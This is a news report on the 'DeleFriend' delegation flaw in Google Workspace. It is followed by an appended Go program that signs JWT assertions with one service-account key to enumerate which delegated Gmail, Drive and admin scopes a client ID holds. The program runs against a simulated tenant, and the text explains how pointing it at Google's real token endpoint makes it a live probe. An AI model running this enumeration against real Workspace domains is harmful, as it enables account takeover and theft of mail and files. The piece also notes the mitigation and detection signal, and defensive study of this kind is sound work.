DeleFriend vulnerability: Hijacking Gmail and Google Drive accounts without user contact

Brother

Researchers have found a way to impersonate a real user and hijack their account.

Google has denied a report about a vulnerability in the design of Google Workspace, identified by Hunters Security specialists. The bug, according to Hunters Security, allows an attacker to steal email from Gmail, extract data from Google Drive, and perform other unauthorized actions in the Google Workspace API.

Researchers from Hunters called the vulnerability "DeleFriend". The bug allows an attacker to manipulate existing Google Cloud Platform (GCP) and Google Workspace delegations without the super-administrator status that is usually required to create new delegations. The flaw makes it possible to search for Google service accounts with domain-wide delegations and escalate privileges.

The problem is that the domain delegation configuration is tied to the service account's resource identifier (OAuth ID), not to the specific private keys associated with the service account identity. In addition, the API level does not implement any restrictions on fuzzing JSON Web Token (JWT) combinations, which allows a cybercriminal to create multiple JWTs with different OAuth scopes (predefined access rules) to try to identify accounts that have domain-level delegation enabled.

However, Google said that there are no security issues in the company's products, and recommended that users use the minimum possible privileges to protect against such attacks. Researchers have published a Proof-of-Concept (PoC) exploit on GitHub that shows how an attacker can use DeleFriend to perform various malicious actions. This includes unauthorized access to data and services, data modification, user tampering, and meeting monitoring in Google Calendar.

Hunters Security offered several solutions to the problem, including limiting the number of JWT requests using the same key and revising the permissions associated with the Editor role. The company reported the issue to Google in August, but Google hasn't fixed the vulnerability yet.
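As an added example (not from the article, the forum poster, or Hunters' published PoC), the following Go program shows the mechanics the post describes: one service-account key signs a series of JWT-bearer assertions that differ only in the impersonated user and the requested scope set, and the responses reveal which delegated scopes the tenant has authorised for that client ID. The JWT layout (iss, sub, scope, aud, iat, exp, signed with RS256) is Google's documented service-account flow; the client email, user names and scope lists are constructed sample input, and NewSimulatedTenant is an assumed offline stand-in for the real token endpoint, so nothing here touches Google.

```go
package main

import (
	"crypto"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"fmt"
	"strings"
	"time"
)

const tokenEndpoint = "https://oauth2.googleapis.com/token"

// Claims is the JWT-bearer assertion a service account presents to the token endpoint.
// Delegation is authorised per OAuth client ID (iss), not per private key; "sub" is the
// impersonated Workspace user and "scope" the delegated scopes being requested.
type Claims struct {
	Iss   string `json:"iss"`
	Sub   string `json:"sub,omitempty"`
	Scope string `json:"scope"`
	Aud   string `json:"aud"`
	Iat   int64  `json:"iat"`
	Exp   int64  `json:"exp"`
}

// SignAssertion builds header.payload.signature with RS256, as a downloaded key file is used.
func SignAssertion(key *rsa.PrivateKey, c Claims) (string, error) {
	payload, _ := json.Marshal(c) // cannot fail for a struct of strings and ints
	enc := base64.RawURLEncoding
	input := enc.EncodeToString([]byte(`{"alg":"RS256","typ":"JWT"}`)) + "." + enc.EncodeToString(payload)
	digest := sha256.Sum256([]byte(input))
	sig, err := rsa.SignPKCS1v15(rand.Reader, key, crypto.SHA256, digest[:])
	if err != nil {
		return "", err
	}
	return input + "." + enc.EncodeToString(sig), nil
}

// VerifyAssertion checks the RS256 signature and decodes the claims; it stands in for the
// endpoint's own validation in the offline simulation below.
func VerifyAssertion(pub *rsa.PublicKey, token string) (c Claims, err error) {
	parts := strings.Split(token, ".")
	if len(parts) != 3 {
		return c, fmt.Errorf("malformed JWT")
	}
	payload, err1 := base64.RawURLEncoding.DecodeString(parts[1])
	sig, err2 := base64.RawURLEncoding.DecodeString(parts[2])
	if err1 != nil || err2 != nil {
		return c, fmt.Errorf("bad base64url in JWT")
	}
	digest := sha256.Sum256([]byte(parts[0] + "." + parts[1]))
	if err = rsa.VerifyPKCS1v15(pub, crypto.SHA256, digest[:], sig); err != nil {
		return c, err
	}
	err = json.Unmarshal(payload, &c)
	return c, err
}

// ProbeDelegation signs one assertion per (user, scope set) with the same key and records
// which combinations exchange (standing in for the grant_type=jwt-bearer POST) accepts.
// sent is how many assertions this single key presented: the volume a per-key limit would cap.
func ProbeDelegation(key *rsa.PrivateKey, iss string, users []string, scopeSets [][]string,
	exchange func(string) bool, now time.Time) (map[string][]string, int, error) {
	accepted, sent := map[string][]string{}, 0
	for _, user := range users {
		for _, scopes := range scopeSets {
			sent++
			scope := strings.Join(scopes, " ")
			jwt, err := SignAssertion(key, Claims{Iss: iss, Sub: user, Scope: scope,
				Aud: tokenEndpoint, Iat: now.Unix(), Exp: now.Add(time.Hour).Unix()})
			if err != nil {
				return nil, sent, err
			}
			if exchange(jwt) {
				accepted[user] = append(accepted[user], scope)
			}
		}
	}
	return accepted, sent, nil
}

// NewSimulatedTenant is a constructed stand-in (not Google's endpoint) for a Workspace domain
// whose admin granted this client ID exactly the scopes in granted: an assertion is accepted
// only if its signature verifies, it names a user, and every requested scope is in the grant.
func NewSimulatedTenant(pub *rsa.PublicKey, granted map[string]bool) func(string) bool {
	return func(assertion string) bool {
		c, err := VerifyAssertion(pub, assertion)
		if err != nil || c.Sub == "" || c.Aud != tokenEndpoint {
			return false
		}
		for _, s := range strings.Fields(c.Scope) {
			if !granted[s] {
				return false
			}
		}
		return true
	}
}

func main() {
	key, _ := rsa.GenerateKey(rand.Reader, 2048) // constructed key; a real attacker holds a leaked key file
	gmail, drive := "https://www.googleapis.com/auth/gmail.readonly", "https://www.googleapis.com/auth/drive"
	admin := "https://www.googleapis.com/auth/admin.directory.user"
	found, sent, err := ProbeDelegation(key, "sa@example.iam.gserviceaccount.com", []string{"alice@example.com"},
		[][]string{{gmail}, {drive}, {gmail, admin}}, NewSimulatedTenant(&key.PublicKey, map[string]bool{gmail: true, drive: true}), time.Now())
	fmt.Println(found, sent, err)
}
```

Swapping NewSimulatedTenant for a real POST of grant_type=urn:ietf:params:oauth:grant-type:jwt-bearer to the token endpoint turns the same loop into the enumeration the post describes, because the real endpoint likewise refuses scope sets the client ID was not authorised for rather than issuing a token. The sent count is the quantity Hunters' suggested mitigation, limiting JWT requests made with one key, would cap, and it is also the per-key signal a defender can alert on: one key presenting many distinct scope sets in a short window.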